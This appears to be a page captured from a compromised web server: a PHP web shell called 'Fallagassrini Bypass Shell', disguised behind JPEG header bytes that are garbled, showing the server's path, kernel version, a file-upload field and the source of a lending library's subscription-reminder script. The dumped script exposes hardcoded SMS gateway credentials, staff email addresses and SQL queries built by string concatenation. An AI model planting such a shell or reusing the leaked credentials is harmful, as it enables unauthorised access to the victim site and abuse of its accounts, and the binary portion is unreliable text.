JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/subscription_mail.php

<?php 
include('is_autheticated.php');
function do_post_request($url, $data, $optional_headers = 'Content-type:application/x-www-form-urlencoded') {
                $params = array('http'      => array(
                                'method'       => 'POST',
                                'content'      => $data,
                                ));
                if ($optional_headers !== null) {
                                $params['http']['header'] = $optional_headers;
                }
                $ctx = stream_context_create($params);
                $response = @file_get_contents($url, false, $ctx);
                if ($response === false) {
                  print "Problem reading data from $url, No status returned ";
                }
                return $response;
}

$sql="SELECT DISTINCT branch,member_name,member_code,id,subscription_end_date,emailid,contact_number,sms_status,mail_status,DATEDIFF(subscription_end_date,DATE(NOW())) AS Count 
	  FROM `members` WHERE `status`='0' AND member_type='Subscription'";//echo $sql;
$source=mysql_query($sql);
while($step=mysql_fetch_array($source))
{
	if($step['Count']<'40')
	{//echo $step['member_code'];
		if($step['Count']=='15' || $step['Count']=='30')
		{
		
//echo $step['member_code'];
$sql_b="select * from branches where id='".$step['branch']."'";
$source_b=mysql_query($sql_b);
$step_b=mysql_fetch_array($source_b);

if($step['sms_status'] ==1)
{
$url = 'http://www.meru.co.in/wip/sendsms?';
$smessage2 = 'M ID:'.$step['member_code'].'Dear Member,Reminder for renewal of subscription. Due date '.$step['subscription_end_date'].'.Pls ignore if already renewed.Ct:'.$step_b['phone_number'].'';
$mobile=substr($step['contact_number'],-10);
$data = 'username=eswlibtxn&password=eswlibtxn&message='.urlencode($smessage2).'&to='.urlencode($mobile);
$response = do_post_request($url, $data);
//print $response;
}
if($step['mail_status']==1)
{
$user_email = 'support@easwarilibrary.in';							
$subject = 'Dear Mr./Ms. '.$step['member_name'].'';
//$to = 'ganeshadroitz@gmail.com';
$to = $step['emailid'];
$eswari = 'Warm Greetings from  Easwari Lending Library !!!';
//$ccarr = 'damemember@gmail.com';
//$to = 'shanmugamkani1994@gmail.com';
	
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
//$user_email1 = 'ganeshadroitz@gmail.com';
// Create email headers
$headers .= 'From: '.$user_email."\r\n".
    'Reply-To: '.$user_email."\r\n" .
    'X-Mailer: PHP/' . phpversion();

$message = '<html><body>';
$message .= '<p style="font-size:22px;">Subscription Renewal</p>';
$message .= '<p style="font-size:16px;">Dear Mr./Ms. '.$step['member_name'].'('.$step['member_code'].')</p>';
$message .= '<p style="color:#080;font-size:16px;">Warm Greetings from  Easwari Lending Library !!!</p>';
$message .= '<p style="font-size:16px;">Reminder for renewal of subscription.Due date '.$step['subscription_end_date'].'. We request you to renew the 
scheme to continue our services. Pls ignore if already renewed.
</p>';
$message .= '<p> <br /> </p>';
$message .= '<p style="font-size:16px;">You can keep in touch with our team.</p>';
$message .= '<p> <br /> </p>';
$message .= '<p> <br /> </p>';
$message .= '<p style="font-size:16px;">With Thanks & Regards.</p>';
$message .= '<p style="font-size:16px;">Easwari Lending Library -Customer Care.</p>';
$message .= '<p style="font-size:16px;">Telephone: 044-'.$step_b['phone_number'].'</p>';
$message .= '<p style="font-size:16px;">Mobile: '.$step_b['mobile_number'].'</p>';
$message .= '<p style="font-size:16px;">Email: support@easwarilibrary.in</p>';
$message .= '<p style="font-size:16px;">Website: easwarilibrary.in</p>';
$message .= '</body></html>';      

       if(mail($to, $subject, $message, $headers, $from ))
        {
             'Your mail has been sent successfully.';
        }
        else
        {
              'Unable to send email. Please try again.';
        }
}
}
elseif($step['Count']=='0')
{		
//echo $step['member_code'];
$sql_b="select * from branches where id='".$step['branch']."'";
$source_b=mysql_query($sql_b);
$step_b=mysql_fetch_array($source_b);
if($step['sms_status'] ==1)
{
$url = 'http://www.meru.co.in/wip/sendsms?';
$smessage2 = 'M id:'.$step['member_code'].'Dear Member,Reminder for renewal of subscription. Due date '.$step['subscription_end_date'].'.Pls ignore if already renewed.Ct:'.$step_b['phone_number'].'';
$mobile=substr($step['contact_number'],-10);
$data = 'username=eswlibtxn&password=eswlibtxn&message='.urlencode($smessage2).'&to='.urlencode($mobile);
$response = do_post_request($url, $data);
//print $response;
}
if($step['mail_status'] ==1)
{
$user_email = 'support@easwarilibrary.in';							
$subject = 'Dear Mr./Ms. '.$step['member_name'].'';
//$to = 'ganeshadroitz@gmail.com';
$to = $step['emailid'];
$eswari = 'Warm Greetings from  Easwari Lending Library !!!';
//$ccarr = 'damemember@gmail.com';
//$to = 'shanmugamkani1994@gmail.com';
	
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
//$user_email1 = 'ganeshadroitz@gmail.com';
// Create email headers
$headers .= 'From: '.$user_email."\r\n".
    'Reply-To: '.$user_email."\r\n" .
    'X-Mailer: PHP/' . phpversion();

$message = '<html><body>';
$message .= '<p style="font-size:22px;">Subscription Renewal</p>';
$message .= '<p style="font-size:16px;">ID NO:'.$step['id'].'</p>';
$message .= '<p style="font-size:16px;">Dear Customer,</p>';
$message .= '<p style="font-size:16px;">We would like to bring to kind notice that your subscription scheme has expired. We request you to renew the scheme to continue to use our services. Please ignore if already renewed.Please continue to use our services.</p>';
$message .= '<p> <br /> </p>';
$message .= '<p style="font-size:16px;">You can keep in touch with our team.</p>';
$message .= '<p> <br /> </p>';
$message .= '<p> <br /> </p>';
$message .= '<p style="font-size:16px;">With Thanks & Regards.</p>';
$message .= '<p style="font-size:16px;">Easwari Lending Library -Customer Care.</p>';
$message .= '<p style="font-size:16px;">Telephone: 044-'.$step_b['phone_number'].'</p>';
$message .= '<p style="font-size:16px;">Mobile: '.$step_b['mobile_number'].'</p>';
$message .= '<p style="font-size:16px;">Email: support@easwarilibrary.in</p>';
$message .= '</body></html>';      

       if(mail($to, $subject, $message, $headers, $from ))
        {
             'Your mail has been sent successfully.';
        }
        else
        {
              'Unable to send email. Please try again.';
        }
}
}
}
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net